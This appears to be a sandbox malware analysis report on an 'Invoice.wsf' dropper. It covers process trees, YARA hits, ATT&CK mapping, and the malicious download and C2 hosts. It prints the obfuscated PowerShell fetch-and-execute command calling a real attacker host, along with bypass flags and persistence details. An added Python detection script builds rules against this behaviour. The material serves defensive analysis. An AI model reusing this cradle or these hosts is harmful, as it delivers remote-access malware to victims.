                Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" [byte[]];$a123='iex(new-object net.w';$b456='ebclient).downlo';[byte[]];$c789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.replace('-@-@-@-$-%^','adstring');[byte[]];iex($a123+$b456+$c789)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Lowering of HIPS / PFW / Operating System Security Settings

                Source: Yara match | File source: 6.2.powershell.exe.238854bf788.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.powershell.exe.238854bf788.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000006.00000002.1876842507.00000238872B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.4120510718.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.4124653013.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.1876842507.00000238853A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 3592, type: MEMORYSTR
                Source: RegSvcs.exe, 00000008.00000002.4121148795.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4121148795.0000000001113000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                Stealing of Sensitive Information

                Source: Yara match | File source: 6.2.powershell.exe.2389d3d0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.powershell.exe.2389d3d0000.2.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.powershell.exe.23886ebeab0.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.powershell.exe.23886ebeab0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000006.00000002.1968474602.000002389D3D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.1876842507.0000023886B23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                Source: Yara match | File source: 6.2.powershell.exe.2389d3d0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.powershell.exe.2389d3d0000.2.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.powershell.exe.23886ebeab0.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.powershell.exe.23886ebeab0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000006.00000002.1968474602.000002389D3D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.1876842507.0000023886B23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: 222 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 1 Windows Management Instrumentation; 1 Native API; 1 Exploitation for Client Execution; 11 Command and Scripting Interpreter; 1 Scheduled Task/Job; 3 PowerShell; Systemd Timers; Container Orchestration Job
Persistence: 222 Scripting; 1 DLL Side-Loading; 1 Scheduled Task/Job; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 1 DLL Side-Loading; 311 Process Injection; 1 Scheduled Task/Job; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Disable or Modify Tools; 11 Deobfuscate/Decode Files or Information; 121 Obfuscated Files or Information; 2 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 21 Virtualization/Sandbox Evasion; 311 Process Injection
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 1 File and Directory Discovery; 13 System Information Discovery; 121 Security Software Discovery; 1 Process Discovery; 21 Virtualization/Sandbox Evasion; 1 Application Window Discovery; Remote System Discovery; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 11 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 1 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 213 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph ID: 1501359 | Sample: Invoice.wsf | Start date: 29/08/2024 | Architecture: WINDOWS | Score: 100

Contacted hosts: kareemovic11.duckdns.org (Uses dynamic DNS services); afclifescience-tiurma.com
Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 17 other signatures

wscript.exe (first instance)
    network: afclifescience-tiurma.com 192.185.141.13, 443, 49730, 49731, UNIFIEDLAYER-AS-1US, United States
    signatures: System process connects to network (likely due to code injection or exploit); VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; 2 other signatures
    started powershell.exe
        dropped: C:\Users\...\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.vbs (ASCII); C:\Users\...\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.ps1 (ASCII); C:\Users\...\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.bat (ASCII)
        started conhost.exe

wscript.exe (second instance)
    signatures: Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage)
    started cmd.exe
        signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Bypasses PowerShell execution policy
        started conhost.exe
        started powershell.exe
            signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; Injects a PE file into a foreign processes
            started RegSvcs.exe
                network: kareemovic11.duckdns.org 104.243.37.177, 49738, 7707, RELIABLESITEUS, United States

Source | Detection | Scanner | Label
Invoice.wsf | 5% | ReversingLabs | Document-HTML.Hacktool.Generic
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://oneget.orgX | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://oneget.org | 0% | URL Reputation | safe
http://www.apache.org/licenses/LICENSE-2.0 | 0% | Avira URL Cloud | safe
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Avira URL Cloud | safe
https://afclifescience-tiurma.com/jxs.txtsC: | 0% | Avira URL Cloud | safe
https://afclifescience-tiurma.com/jxs.txtLMEMX | 0% | Avira URL Cloud | safe
https://afclifescience-tiurma.com/jxs.txt | 0% | Avira URL Cloud | safe
kareemovic11.duckdns.org | 100% | Avira URL Cloud | malware
https://afclifescience-tiurma.com/jxs.txtkR | 0% | Avira URL Cloud | safe
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
https://afclifescience-tiurma.LWD | 0% | Avira URL Cloud | safe
https://afclifescience-tiurma.com/rkem.jpg | 0% | Avira URL Cloud | safe
https://afclifescience-tiurma.com/jxs.txtWRx | 0% | Avira URL Cloud | safe
https://afclifescience-tiurma.com/jxs.txtc | 0% | Avira URL Cloud | safe
https://afclifescience-tiurma.com/rkem.jpgX | 0% | Avira URL Cloud | safe
https://afclifescience-tiurma.com | 0% | Avira URL Cloud | safe
http://afclifescience-tiurma.com | 0% | Avira URL Cloud | safe
https://afclifescience-tiurma.com/ | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
afclifescience-tiurma.com | 192.185.141.13 | true | true | (none) | unknown
kareemovic11.duckdns.org | 104.243.37.177 | true | true | (none) | unknown
Name | Malicious | Antivirus Detection | Reputation
https://afclifescience-tiurma.com/jxs.txt | true | Avira URL Cloud: safe | unknown
kareemovic11.duckdns.org | true | Avira URL Cloud: malware | unknown
https://afclifescience-tiurma.com/rkem.jpg | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.1740752837.0000021E9D980000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1718048847.0000021E8F44A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1949124988.00000238954D3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000001.00000002.1718048847.0000021E8F0A4000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://afclifescience-tiurma.com/jxs.txtLMEMX | wscript.exe, 00000000.00000003.1659263002.000002092EA81000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000006.00000002.1876842507.0000023885315000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000006.00000002.1876842507.0000023885315000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://go.micro | powershell.exe, 00000001.00000002.1718048847.0000021E8E4DF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000006.00000002.1949124988.00000238954D3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000006.00000002.1949124988.00000238954D3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://afclifescience-tiurma.com/jxs.txtkR | wscript.exe, 00000000.00000003.1659263002.000002092EA81000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000006.00000002.1876842507.0000023885315000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://afclifescience-tiurma.com/jxs.txtsC: | wscript.exe, 00000000.00000003.1659201525.000002092EA54000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://afclifescience-tiurma.LWD | wscript.exe, 00000000.00000002.1753518951.000002092EA81000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://afclifescience-tiurma.com/jxs.txtWRx | wscript.exe, 00000000.00000003.1659263002.000002092EA81000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://afclifescience-tiurma.com/jxs.txtc | wscript.exe, 00000000.00000003.1660289317.0000020930687000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1659957741.0000020930681000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1659992249.0000020930686000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1660024016.0000020930686000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://afclifescience-tiurma.com/ | wscript.exe, 00000000.00000003.1659330673.000002092EA21000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1753518951.000002092EA1C000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000006.00000002.1949124988.00000238954D3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.1740752837.0000021E9D980000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1718048847.0000021E8F44A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1949124988.00000238954D3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://oneget.orgX | powershell.exe, 00000001.00000002.1718048847.0000021E8F0A4000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://afclifescience-tiurma.com/rkem.jpgX | powershell.exe, 00000001.00000002.1718048847.0000021E8ED7B000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000001.00000002.1718048847.0000021E8D911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1876842507.00000238850F1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://afclifescience-tiurma.com | powershell.exe, 00000001.00000002.1718048847.0000021E8ED7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1718048847.0000021E8DB31000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.1718048847.0000021E8D911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1876842507.00000238850F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4124653013.0000000002E81000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://afclifescience-tiurma.com | powershell.exe, 00000001.00000002.1718048847.0000021E8F05D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://oneget.org | powershell.exe, 00000001.00000002.1718048847.0000021E8F0A4000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.243.37.177 | kareemovic11.duckdns.org | United States | 23470 | RELIABLESITEUS | true
192.185.141.13 | afclifescience-tiurma.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1501359
                    Start date and time:2024-08-29 19:41:04 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 7m 7s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:13
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:Invoice.wsf
                    Detection:MAL
                    Classification:mal100.troj.expl.evad.winWSF@13/9@2/2
                    EGA Information:
                    • Successful, ratio: 33.3%
                    HCA Information:
                    • Successful, ratio: 96%
                    • Number of executed functions: 65
                    • Number of non-executed functions: 2
                    Cookbook Comments:
                    • Found application associated with file extension: .wsf
                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target powershell.exe, PID 1344 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 7104 because it is empty
• Not all processes were analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • VT rate limit hit for: Invoice.wsf
Time | Type | Description
13:41:55 | API Interceptor | 83x Sleep call for process: powershell.exe modified
13:42:51 | API Interceptor | 8745163x Sleep call for process: RegSvcs.exe modified
18:41:59 | Task Scheduler | Run new task: Windows DuckDown Reflection, taskFolder: true, path: C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.vbs
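The facts behind several of the Sigma-style signatures in this report are visible in the behavior graph and the dropped files: wscript.exe launching PowerShell directly (first instance) and via cmd.exe (second instance), the .bat passing -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass, every dropped script living under C:\Users\Public, PowerShell spawning R_egSvcs.exe as an injection target, and a scheduled task ("Windows DuckDown Reflection") that runs the .vbs from that folder. The Python below is an added example, not the sandbox's own detection code: it states those checks as rules over process-creation records and a task record. The records are constructed to mirror this report's process tree (pids, the Desktop path and the benign control row are invented; field names loosely follow Sysmon event ID 1), and the rule names are mine.

```python
import re

# Constructed process-creation records modelled on this report's behavior graph.
# pids, the Desktop path and the benign control row (pid 800) are invented.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\Invoice.wsf"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "POWeRSHeLL [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO'"},
    {"pid": 400, "ppid": 1, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.vbs'},
    {"pid": 500, "ppid": 400, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c "C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.bat"'},
    {"pid": 600, "ppid": 500, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'''powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.ps1'"'''},
    {"pid": 700, "ppid": 600, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "cmdline": "RegSvcs.exe"},
    {"pid": 800, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -NoProfile -Command "Get-Process"'},
]
# Constructed scheduled-task record mirroring the task this report saw being created.
TASKS = [{"name": "Windows DuckDown Reflection",
          "action": r"C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.vbs"}]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# .NET framework utilities commonly used as injection targets (RegSvcs.exe is the one seen here).
DOTNET_UTILITIES = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe"}
PUBLIC_SCRIPT = re.compile(
    r"c:\\users\\public\\[^\s\"']+\.(?:vbs|vbe|js|jse|wsf|wsh|bat|cmd|ps1)\b", re.I)
EP_BYPASS = re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestors(ev, by_pid, depth):
    """Yield up to `depth` parent records, stopping when the parent is unknown."""
    cur = ev
    for _ in range(depth):
        cur = by_pid.get(cur["ppid"])
        if cur is None:
            return
        yield cur


def run_rules(events):
    """Return (rule_name, pid) pairs for every record that matches a rule."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for ev in events:
        name = basename(ev["image"])
        parents = [basename(p["image"]) for p in ancestors(ev, by_pid, 2)]
        if name in POWERSHELL:
            # "Wscript starts Powershell (via cmd or directly)": script host is parent or grandparent via cmd.
            direct = bool(parents) and parents[0] in SCRIPT_HOSTS
            via_cmd = len(parents) == 2 and parents[0] == "cmd.exe" and parents[1] in SCRIPT_HOSTS
            if direct or via_cmd:
                hits.append(("wscript_starts_powershell", ev["pid"]))
            # "Bypasses PowerShell execution policy": the .bat's -ExecutionPolicy Bypass, or its short forms.
            if EP_BYPASS.search(ev["cmdline"]):
                hits.append(("powershell_execution_policy_bypass", ev["pid"]))
        # "Script Interpreter Execution From Suspicious Folder": any interpreter fed a script from C:\Users\Public.
        if name in SCRIPT_HOSTS | POWERSHELL | {"cmd.exe"} and PUBLIC_SCRIPT.search(ev["cmdline"]):
            hits.append(("script_from_public_folder", ev["pid"]))
        # PowerShell spawning a .NET utility such as RegSvcs.exe: the injection target in this chain.
        if name in DOTNET_UTILITIES and parents and parents[0] in POWERSHELL:
            hits.append(("powershell_spawns_dotnet_utility", ev["pid"]))
    return hits


def check_tasks(tasks):
    """Scheduled task whose action is a script under C:\\Users\\Public: the persistence seen here."""
    return [("task_runs_script_from_public_folder", t["name"])
            for t in tasks if PUBLIC_SCRIPT.search(t["action"])]


if __name__ == "__main__":
    for rule, subject in run_rules(EVENTS) + check_tasks(TASKS):
        print(f"{rule}: {subject}")
```

The parent walk is limited to two levels on purpose: the report's chain is wscript.exe, then cmd.exe, then powershell.exe, and going deeper would turn every descendant of a script host into a hit. The benign powershell.exe row (pid 800, started from explorer.exe without a bypass flag) produces no alert.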
Match | Associated Sample Name / URL | Detection | Threat Name
192.185.141.13 | THYH-1148073298.xlsb | malicious | Hidden Macro 4.0
192.185.141.13 | THYH-1148073298.xlsb | malicious | Hidden Macro 4.0
192.185.141.13 | THYH-1981400587.xlsb | malicious | Hidden Macro 4.0
192.185.141.13 | THYH-1981400587.xlsb | malicious | Hidden Macro 4.0
192.185.141.13 | THYH-1981400587.xlsb | malicious | Hidden Macro 4.0
192.185.141.13 | THYH-1004058603.xlsb | malicious | Hidden Macro 4.0
192.185.141.13 | THYH-1004058603.xlsb | malicious | Hidden Macro 4.0
                                  No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
UNIFIEDLAYER-AS-1US | http://premium.davidabostic.com | malicious | Unknown | 162.241.252.155
UNIFIEDLAYER-AS-1US | https://alkimialofts.com/on%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/ | malicious | HTMLPhisher | 108.179.194.43
UNIFIEDLAYER-AS-1US | Message-ID 08282024 110831 PM.pdf | malicious | HTMLPhisher | 192.254.189.196
UNIFIEDLAYER-AS-1US | bintoday1.exe | malicious | FormBook | 198.57.245.28
UNIFIEDLAYER-AS-1US | Document_pdf.exe | malicious | FormBook | 162.240.81.18
UNIFIEDLAYER-AS-1US | https://thb.oui.mybluehost.me/Betalingsservice/betal | malicious | Unknown | 162.241.217.174
UNIFIEDLAYER-AS-1US | Hua San Particulars.doc.scr.exe | malicious | AgentTesla | 50.87.144.157
UNIFIEDLAYER-AS-1US | BULK HARVEST - VESSEL PARTICULARS.docx.scr.exe | malicious | AgentTesla | 50.87.144.157
UNIFIEDLAYER-AS-1US | Catalina - Particulars.pdf.scr.exe | malicious | AgentTesla | 50.87.144.157
UNIFIEDLAYER-AS-1US | rRFQ.bat.exe | malicious | FormBook | 162.241.226.190
RELIABLESITEUS | Ravakhu24105.exe | malicious | Remcos | 185.150.191.117
RELIABLESITEUS | Upit za prevoz 28 08 2024 1037 Agrorit d.o.o.exe | malicious | AgentTesla | 104.243.47.142
RELIABLESITEUS | 232.exe | malicious | RedLine, SectopRAT | 194.26.29.100
RELIABLESITEUS | rebate.exe | malicious | RedLine, SectopRAT | 194.26.29.100
RELIABLESITEUS | C0DcOwxwfi.exe | malicious | RedLine | 194.26.29.100
RELIABLESITEUS | MsvL2pjs5Y.exe | malicious | AveMaria, WhiteSnake Stealer | 195.7.5.161
RELIABLESITEUS | 47CkiftRs9.exe | malicious | Unknown | 172.93.106.189
RELIABLESITEUS | 7GfciIf7ys.exe | malicious | Unknown | 172.93.106.189
RELIABLESITEUS | AK4UlXhsnL.exe | malicious | Unknown | 172.93.103.101
RELIABLESITEUS | https://bhaez.cuakss.biz.id/ | malicious | Unknown | 172.96.160.168
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.Win64.DropperX-gen.8867.28776.exe | malicious | Unknown | 192.185.141.13
3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.Win64.DropperX-gen.8867.28776.exe | malicious | Unknown | 192.185.141.13
3b5074b1b5d032e5620f69f9f700ff0e | http://getquckbulck.top | malicious | Unknown | 192.185.141.13
3b5074b1b5d032e5620f69f9f700ff0e | z47maaaaaaaaaaaaax.exe | malicious | AgentTesla | 192.185.141.13
3b5074b1b5d032e5620f69f9f700ff0e | https://decktop.us/MUYKd1 | malicious | Unknown | 192.185.141.13
3b5074b1b5d032e5620f69f9f700ff0e | Page1.exe | malicious | AgentTesla, GuLoader | 192.185.141.13
3b5074b1b5d032e5620f69f9f700ff0e | Detailed Itinerary.exe | malicious | PureLog Stealer, XWorm | 192.185.141.13
3b5074b1b5d032e5620f69f9f700ff0e | https://tmx.velsol.com/Reporting/Document.aspx?MasterAgreementID=i1339-005394573&ID=aQAxADMAMwA5AC0AMAAwADUAMwA5ADQANQA3ADMA. | malicious | Unknown | 192.185.141.13
3b5074b1b5d032e5620f69f9f700ff0e | Nettably.exe | malicious | Snake Keylogger | 192.185.141.13
3b5074b1b5d032e5620f69f9f700ff0e | DHL Page1.exe | malicious | GuLoader | 192.185.141.13
37f463bf4616ecd445d4a1937da06e19 | x64_installer__v4.6.0.msi | malicious | Unknown | 192.185.141.13
37f463bf4616ecd445d4a1937da06e19 | SHIPMENT_DOCMSS24071327.exe | malicious | GuLoader | 192.185.141.13
37f463bf4616ecd445d4a1937da06e19 | hhs.exe | malicious | Unknown | 192.185.141.13
37f463bf4616ecd445d4a1937da06e19 | x64_installer__v4.5.9.msi | malicious | Unknown | 192.185.141.13
37f463bf4616ecd445d4a1937da06e19 | 3Ojkq6hcM1.msi | malicious | Unknown | 192.185.141.13
37f463bf4616ecd445d4a1937da06e19 | Nettably.exe | malicious | Snake Keylogger | 192.185.141.13
